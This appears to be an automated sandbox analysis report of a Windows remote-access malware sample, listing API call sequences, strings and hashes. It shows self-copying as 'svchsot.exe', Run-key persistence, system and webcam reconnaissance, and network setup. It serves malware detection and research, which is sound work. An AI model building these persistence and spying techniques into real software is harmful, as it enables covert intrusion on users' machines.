                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 1000299C
                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 100029A5
                                                                                              • Sleep.KERNEL32(00000032), ref: 100029B3
                                                                                              • wsprintfA.USER32 ref: 100029E8
                                                                                              • lstrcat.KERNEL32(?,\svchsot.exe), ref: 100029F7
                                                                                              • MoveFileA.KERNEL32(?,?), ref: 10002A1D
                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 10002A32
                                                                                              • wsprintfA.USER32 ref: 10002A4A
                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 10002A56
                                                                                              • Sleep.KERNEL32(000003E8), ref: 10002A7F
                                                                                              • FindWindowA.USER32(00000000,1007A204), ref: 10002A88
                                                                                              • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002A95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileResourcelstrcat$DirectoryFindSleepwsprintf$??2@??3@CopyCreateLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
                                                                                              • String ID: %s\JH.BAT$LLLLLL$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe
                                                                                              • API String ID: 426448433-1350257756
                                                                                              • Opcode ID: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                                                                              • Instruction ID: 7e78db92d01b1022693add636c3c748d173f9461a296e18299dfe13d1dc5dce8
                                                                                              • Opcode Fuzzy Hash: 6d98c662a98864542062ff972e89dce42718af20c829256efac473ef5170f2d3
                                                                                              • Instruction Fuzzy Hash: A531A472144395BBE310DBA4CC85FEB73A9EBC8700F004D1CF38496080EBB9A548CBA6

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • wsprintfA.USER32 ref: 100013C0
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
                                                                                              • String ID: GGGGGG$XXXXXX
                                                                                              • API String ID: 3303837233-960986945
                                                                                              • Opcode ID: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                                                                              • Instruction ID: ac7a2d40f97e3ef275d1792f4a74c8e88388e2e8796807a1ab99ef5296ea06a1
                                                                                              • Opcode Fuzzy Hash: cc1146a021282efb5b2e256a42fc67f220187294097d6b15d6d16da5d321ef9b
                                                                                              • Instruction Fuzzy Hash: 9431C7766006046BE318CBB4CC56BEB779AEBC4360F144B2DF667972C1DEE49D088295

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32 ref: 10001624
                                                                                                • Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
                                                                                                • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
                                                                                                • Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
                                                                                                • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365
                                                                                              • getsockname.WS2_32 ref: 10001679
                                                                                                • Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                                                                                • Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                                                                                • Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 100016B0
                                                                                                • Part of subcall function 100012A0: 6CC61E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                                                                              • GlobalMemoryStatus.KERNEL32 ref: 100016E8
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                                • Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                                                                                • Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                                                                                • Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                                                                                • Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                                                                                • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
                                                                                                • Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
                                                                                                • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA
                                                                                                • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                                                                                • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryFirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
                                                                                              • String ID: $VVVVVV$f
                                                                                              • API String ID: 965855644-510421235
                                                                                              • Opcode ID: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                                                                              • Instruction ID: 195f56337f309cec53029e41885cee457b9433af063c58e809775b1897ec5c08
                                                                                              • Opcode Fuzzy Hash: 64974564b339baab4ba4e779f8b5793599d933840332e7d8fd09318f2be7bc69
                                                                                              • Instruction Fuzzy Hash: 9D3170B55083859FD324CF24C885ADBBBE5FBC8344F008A1DF58983241DB74AA49CBA2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 248 1000dda0-1000ddd1 249 1000ddd7 248->249 250 1000deeb-1000df0a call 1000df0b 248->250 251 1000de05-1000de1f RegOpenKeyExA 249->251 252 1000de86-1000dea0 RegOpenKeyExA 249->252 253 1000deb6-1000ded0 RegOpenKeyExA 249->253 254 1000ddde-1000ddff RegCreateKeyExA 249->254 251->250 259 1000de25-1000de2a 251->259 252->250 256 1000dea2-1000deb2 RegDeleteKeyA 252->256 253->250 257 1000ded2-1000dee2 RegDeleteValueA 253->257 254->250 254->251 256->250 261 1000deb4 256->261 257->250 262 1000dee4 257->262 259->250 260 1000de30-1000de33 259->260 263 1000de60-1000de82 RegSetValueExA 260->263 264 1000de35-1000de38 260->264 261->262 262->250 263->250 266 1000de84 263->266 264->250 265 1000de3e-1000de55 RegSetValueExA 264->265 265->250 267 1000de5b 265->267 266->262 267->262
                                                                                              APIs
                                                                                              • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,753C8400,753C8400,753C8400,00000000,76F88A60,?,00000000,00000001,?), ref: 1000DDF7
                                                                                              • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DE17
                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DE4D
                                                                                              • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000DE7A
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DE98
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000DEAA
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000DEC8
                                                                                              • RegDeleteValueA.ADVAPI32(?,?), ref: 1000DEDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: OpenValue$Delete$Create
                                                                                              • String ID:
                                                                                              • API String ID: 2295199933-0
                                                                                              • Opcode ID: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                                                                              • Instruction ID: 67a97fe157c163e159881c9215a6b69e3a943ce5662b6e6d27993ba540d2685e
                                                                                              • Opcode Fuzzy Hash: dfa9c450c80950de0395e4e7346e7bf10f91bfe681af39af305210a63dd43573
                                                                                              • Instruction Fuzzy Hash: FA415DB1600289ABEB10EF95CD84EAFB7BDFB58790B10851AFA19D7184D771ED008B70

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                                                                                • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                                                                                • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                                                                                • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                                                                                • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                                                                              • ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                                                                              • socket.WS2_32 ref: 10003966
                                                                                              • gethostbyname.WS2_32(?), ref: 10003986
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                                                                              • String ID:
                                                                                              • API String ID: 513860241-0
                                                                                              • Opcode ID: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                                                                              • Instruction ID: 7f2db06767454f243879fc9fac78131effb9a87e5068b181b0692220e83332b6
                                                                                              • Opcode Fuzzy Hash: f5d5e40a01575f7ff4510ad924051b1898b7209a945d550d58589024808b7694
                                                                                              • Instruction Fuzzy Hash: 9531A375204351BFE320DF68CC85F9BB7E9AF85754F00850DF1999B290DBB198498752

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                                                                              • Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                                                                              • _strcmpi.MSVCRT ref: 10012658
                                                                                              • Process32Next.KERNEL32(00000000,00000000), ref: 1001266F
                                                                                              • lstrcmpiA.KERNEL32(00000024,?), ref: 1001267A
                                                                                              • Process32Next.KERNEL32(00000000,00000000), ref: 10012686
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3655294272-0
                                                                                              • Opcode ID: 67c08678b8a741a8853cf96a4596b8c1c3ecd4c282c82cf466cdddd3c9690391
                                                                                              • Instruction ID: 7b96640b3de945d751338f4a492b60aca70c41a0bc2120e114b52792a7ac63ae
                                                                                              • Opcode Fuzzy Hash: 67c08678b8a741a8853cf96a4596b8c1c3ecd4c282c82cf466cdddd3c9690391
                                                                                              • Instruction Fuzzy Hash: B9F0A4B130135627E6109676AC45EA77BDDCF826E6F011425FA04E9081FB31E96092B5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 288 100012e0-1000135a wsprintfA call 1000d900 lstrlen 291 10001364-10001370 lstrlen 288->291 292 1000135c-1000135e gethostname 288->292 292->291
                                                                                              APIs
                                                                                              • wsprintfA.USER32 ref: 1000132A
                                                                                                • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                                                                              • lstrlen.KERNEL32(?), ref: 10001356
                                                                                              • gethostname.WS2_32(?,?), ref: 1000135E
                                                                                              • lstrlen.KERNEL32(?), ref: 10001365
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Opengethostnamewsprintf
                                                                                              • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                                                                              • API String ID: 2381335061-3973614608
                                                                                              • Opcode ID: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                                                                              • Instruction ID: 00a212d8d59931bd4f36ea5daea73ab107ff809958005370ca5a53895ebf1fbb
                                                                                              • Opcode Fuzzy Hash: 92b43f06b2ba5dd0f53fd441dc8e5a695e761c9028b70946e1b6b411c71be7b7
                                                                                              • Instruction Fuzzy Hash: 2D01F7712003547FF7209224CC55FEB729EEFC8754F008828F74593240D6B56D4586A6

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 293 10003780-10003854 call 100033d0 * 4 WSAStartup CreateEventA
                                                                                              APIs
                                                                                                • Part of subcall function 100033D0: RtlInitializeCriticalSection.NTDLL(?), ref: 100033E8
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateCriticalEventInitializeSectionStartup
                                                                                              • String ID: 0$G$h$s
                                                                                              • API String ID: 1327880603-311548548
                                                                                              • Opcode ID: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                                                                              • Instruction ID: 055722d880a944932a15ed8300a47e19ec8ef09bbf59dd5dab02bd7fde056146
                                                                                              • Opcode Fuzzy Hash: 21ddecf2d21aa6d545d3b10116af13633dc4fe99f0d64337955797704fc22f9f
                                                                                              • Instruction Fuzzy Hash: 81216D342097C09EE325CB28C945B87BBD9EB96B14F04895DE4EA472C1CBB96509CB63

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                              • FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                              • LockResource.KERNEL32(00000000), ref: 10009758
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$??2@??3@FindLoadLock
                                                                                              • String ID: HOST
                                                                                              • API String ID: 472997506-4189257289
                                                                                              • Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                                                                              • Instruction ID: d48a8112f6b242a354970dd34bc60e7fd0122bfa4f1a00ce6be9372c3ccc99b8
                                                                                              • Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                                                                                              • Instruction Fuzzy Hash: 03F0F6F37002102BF600DAB89CCAFAB228DDB85379F040434F704DB281DA659C505262
                                                                                              APIs
                                                                                              • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                                                                                              • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,76F90F00,00000000), ref: 10001280
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,76F90F00,00000000), ref: 1000128B
                                                                                              Strings
                                                                                              • ~MHz, xrefs: 1000127A
                                                                                              • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                              • API String ID: 3677997916-2226868861
                                                                                              • Opcode ID: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                                                                              • Instruction ID: 35c208d4d3540590a10e284a9e24e56e80ebe8266937a50f360b862ca68792b9
                                                                                              • Opcode Fuzzy Hash: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                                                                              • Instruction Fuzzy Hash: 10F0F2B8508345BFE300DB64CD88E6BB7E9EBC8708F00CD0CF68982210E674E958CB56
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(00025AE0,00000014), ref: 0040138E
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 004013AA
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401418
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040143F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$AddressLibraryLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 2438460464-0
                                                                                              • Opcode ID: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                                                                              • Instruction ID: 0e99147658626de8a4eabd926d73d9b79b83d8c6d3faf898b778abdf7a68cf47
                                                                                              • Opcode Fuzzy Hash: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                                                                              • Instruction Fuzzy Hash: 4631A6727002069BD720CF29DC40A17F7A4FF84364B16453AE91AE77B1E739E815DB94
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32 ref: 00401A5F
                                                                                                • Part of subcall function 00402F1C: HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                                                                                • Part of subcall function 00402F1C: HeapDestroy.KERNEL32 ref: 00402F6C
                                                                                              • GetCommandLineA.KERNEL32 ref: 00401AAD
